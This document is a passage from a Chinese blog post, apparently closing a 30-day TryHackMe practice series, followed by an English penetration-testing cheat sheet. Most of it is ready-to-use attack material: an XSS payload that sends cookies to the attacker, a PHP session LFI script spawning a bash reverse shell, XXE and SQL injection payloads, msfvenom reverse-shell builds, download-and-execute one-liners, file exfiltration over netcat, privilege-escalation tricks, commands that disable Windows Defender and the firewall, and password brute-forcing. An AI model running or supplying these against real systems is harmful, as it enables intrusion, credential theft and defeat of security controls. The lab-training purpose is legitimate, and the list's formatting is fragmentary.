終於到了最後一天了,感覺這陣子打了好多好多的靶機哦,希望過去的這些文章可以對大家有一些幫助。非常感謝隊友的提醒與鼓勵,我才有辦法撐過雙主題的 30 天 QQ,也非常感謝飛飛贊助給我 TryHackMe 的帳號。
另外,我也有將過去打過的各種題型與內容整理成了 Cheat Sheet 可以供大家參考,不過為了可以快速的 Ctrl + F
搜尋到關鍵字,所以我的內容是寫英文ㄉ,我也會將過去以及未來練習的所有資源放置於我的 Github 上,供大家參考!再次感謝看到最後一篇的大家!
-A
: Enable OS detection, version detection, script scanning, and traceroute-p-
: Scan all ports-p 1000-9999
: Scan port from 1000 to 9999rustscan -a 10.10.166.15
-r 1-65535
: Port range from 1 to 65535-a
: Do all simple enumerationffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-20000.txt -u http://{domain.name}/ -H "Host: FUZZ.{domain.name}" -fs {normal_size}
/usr/share/dnsrecon/subdomains-top1mil.txt
<script>new Image().src="http://{my_ip}:1234/"+document.cookie</script>
nc -l 1234
<form id="myForm" name="myForm" action="/change_pass.php" method="POST">
<input type=hidden name="password" id="password" value="meowmeow"/>
<input type=hidden name="confirm_password" id="confirm_password" value="meowmeow"/>
<input type=hidden name="submit" id="submit" value="submit"/>
<script>document.createElement('form').submit.call(document.getElementById('myForm'))</script>
/var/log/apache2/access.log
/cgi-bin/*.sh
() { :;}; echo; /usr/bin/id
to User-Agent
C:\inetpub\wwwroot
/manager/status/all
/admin/dashboard
/..;/
/manager/status/..;/html/upload
system
echo passthru("whoami")
echo shell_exec("whoami")
echo exec("whoami")
php://filter/convert.base64-encode/resource=meow.php
/var/lib/php/sessions/sess_{sess_name}
import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://{target-domain}/{target-path/randylogs.php}'
param = "file"
# code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
code = '''system("bash -c 'bash -i >& /dev/tcp/{domain}/{port} 0>&1'");'''
while True:
req = [grequests.post(base_url,
files={'f': "A"*0xffff},
data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
cookies={'PHPSESSID': sess_name}),
grequests.get(f"{base_url}?{param}={sess_path}")]
result = grequests.map(req)
if "pwned" in result[1].text:
print(result[1].text)
break
var xml = '' +
'<?xml version="1.0" encoding="UTF-8"?>\n' +
'<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>\n' +
'<root>' +
'<name>' + "0" + '</name>' +
'<search>' + "&b;" + '</search>' +
'</root>';
jar -cvf cmd.war cmd.jsp
and upload to Tomcat admin/etc/knockd.conf
nc
port several time to knockWPScan
wpscan --url {URL} –-enumerate p,t,u --plugins-detection aggressive -t 30
Enum user
http://{ip}/index.php/?author=1
LIMIT 0,1
, LIMIT 1,1
, LIMIT 2,1
...
SUBSTRING("ABC",1,1)
A
SUBSTRING("ABC",2,1)
B
ASCII("A")
65
concat(1,':',2)
1:2
select schema_name from information_schema.schemata
select table_name from information_schema.tables where table_schema='{db_name}'
select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{db_name}'
select concat({username},':',{password}) from {db_name}.{password}
select concat(user,':',password) from mysql.user
mysqldump -u {username} -h localhost -p {dbname} > a.sql
find / -iname {file_name} -print 2>/dev/null
du -a 2>/dev/null | grep {file_name}
tar cf - $PWD 2>/dev/null | tar tvf - | grep {file_name}
dir /a
dir {file_name} /s /p
nc -nvlp {port}
nc -vlk {port}
rlwrap nc -nvlp
bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'
/usr/bin/wget -O - {ip:port}/{file} | /bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
perl -e 'exec "/bin/bash";'
shell/reverse_tcp
multi/handler
to receiveshell_reverse_tcp
nc
to receivemsfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx
msfvenom -p windows/shell/reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe > shell-x86.exe
msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f exe > shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe -o shellx64.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi
msiexec /quiet /i shellx64.msi
powershell iex (New-Object Net.WebClient).DownloadString('http://{my_ip}:{http_port}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {my_ip} -Port {shell_port}
python3 -m http.server
sudo
to get
80 portwget {my_ip}:{port}/{file_name} -O {path_to_output}
curl -o {path_to_output} http
nc -l -p {attacker_port} > {file}
nc {attacker_ip} {attacker_port} < {file}
cat {file} > /dev/tcp/{ip}/{port}
python3 -m http.server
wget
, curl
, iwr
is alias for Invoke-WebRequest
Invoke-WebRequest http://{my_ip}:{my_port}/{file} -outFile {file_name}
-UseBasicParsing
certutil -urlcache -f {URL} {File_name}
impacket-smbserver meow .
-smb2support
copy \\{IP}\meow\{filename} {filename}
lcab -r {dir} {file.cab}
expand {file.cab} -F:* {Extract path}
C:\Windows\Temp
redis-cli -h {ip}
config set dir "/var/www/html"
config set dbfilename meow.php
set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"
save
impacket-mssqlclient -p {port} {UserID}@{IP} -windows-auth
exec xp_cmdshell '{Command}
nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
hydra -L sids-oracle.txt -s 1521 {IP} oracle-sid
tnscmd10g status --10G -p {port} -h {IP}
./odat all -s {IP} -p {PORT} -d {SID}
--accounts-file
, --accounts-files
odat-libc2.12-x86_64 ./odat-libc2.12-x86_64 dbmsscheduler -U {Username} -P {Password} -d {SID} -s {IP} --sysdba --exec "{command}"
winexe -U '{username}' //{ip} cmd.exe
impacket-smbexec '{username}:{password}'@{ip}
impacket-psexec {username}:{password}'@{ip}
PGPASSWORD="{PASSWORD}" pg_dump {DB_NAME} > test.dump
Scan the system to find which can be use for privileges escalation
python -c "import sys;print(sys.path)"
mport pty
ty.spawn("/bin/bash")
``
$PATH
PATH=/my/fake/path:$PATH ./binary
tar
Wildcard
echo "bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'" > shell.sh
chmod 777 shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
doas.conf
permit nopass {user} as {root} cmd {binary}
doas {binary}
and it will run as root/.dockerenv
sudo -l
cat /etc/crontab
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
sudo -u#-1 binary
getcap -r / 2>/dev/null
send_and_execute.py
guest
ms15-051x64.exe whoami
SeImpersonate
or SeAssignPrimaryToken
by whoami /priv
JuicyPotato.exe -l 1337 -p shell7878.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
-c
(Include curly brackets)
-p
Exe Programreg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi
msiexec /quiet /i shellx64.msi
Get-AppLockerOolicy -Effective | Select -Expandproperty RuleCollections
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe
Set-MpPreference -DisableRealtimeMonitoring $true
Uninstall-WindowsFeature -Name Windows-Defender –whatif
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
powershell -c Get-MpComputerStatus
AntivirusEnabled
is True
or False
systeminfo
windows-exploit-suggester.py --update
windows-exploit-suggester.py --database {Database file} --systeminfo {systeminfofile}
systeminfo
python3 wesng.py --update
python3 wesng.py {systeminfofile}
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
netstat -ano
netstat -an | findstr "LISTENING"
tasklist
icacls
/reset
reset the permission to their parentcpau -u {user_name} -p {password} -ex C:\{abs_exe_path} -LWP
hydra -l {username} -P {path_to_wordlist} ssh://{ip_address}
hydra -l {username} -P {path_to_wordlist} {domain_name_without http/s} http{s}-post-form "{/{path}}:username=^USER^&password=^PASS^&data=data:{string_if_fail}"
/etc/shadow
samdump2 system sam > j.txt
john {file} --wordlist={wordlist}
hashcat -m {mode} {hashes.txt} {wordlist.txt}
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
xfreerdp +drives /u:{username} /v:{ip}:{port}
ls
get {file_name}
put {file_name}
wget -r 'ftp://{ip}/{path}/'
.gz
gunzip {filename.gz}
sudo tcpdump -i tun0 icmp
./chisel server -p {listen_port} --reverse
./chisel client {Remote_host}:{listen_port} R:{forward_port_at_attacker}:127.0.0.1:{forward_port}
127.0.0.1:8888
,we need to forward to our attack machine's 127.0.0.1:8888
./chisel server -p 9999 --reverse
./chisel client 10.10.16.35:9999 R:8888:127.0.0.1:8888
ssh -L {forward_port}:127.0.0.1:{forward_port} {remote_user}@{remote_ip} -p {ssh_port} -N -v -v
10.87.87.87
run 5555
in remote local, open 2222
port for ssh, we can use following command to forward 5555
to our local 5555
ssh -L 5555:127.0.0.1:5555 demo@10.87.87.87 -p 2222 -N -v -v
file {file_name}
binwalk {file_name}
xxd {file_name}
foremost {file_name}
dd if={input_file} bs=1 skip={skip_offset} of={outfile}